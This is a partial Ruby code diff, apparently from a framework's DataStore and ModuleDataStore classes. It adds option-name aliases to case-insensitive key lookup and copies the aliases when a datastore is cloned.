@aliases[a.downcase] = key.downcase
end
end
@options[key] = option
@imported[key] = imported
@imported[key] = imported
@imported_by[key] = imported_by
end
@ -245,9 +253,15 @@ protected
#
def find_key_case(k)
# Scan each alias looking for a key
search_k = k.downcase
if @aliases.has_key?(search_k)
search_k = @aliases[search_k]
end
# Scan each key looking for a match
self.each_key do |rk|
if (rk.downcase == k.downcase)
if rk.downcase == search_k
return rk
end
end
@ -317,6 +331,7 @@ class ModuleDataStore < DataStore
self.keys.each do |k|
clone.import_option(k, self[k].kind_of?(String) ? self[k].dup : self[k], @imported[k], @imported_by[k])
end
clone.aliases = self.aliases
clone
end
end

Some files were not shown because too many files have changed in this diff Show More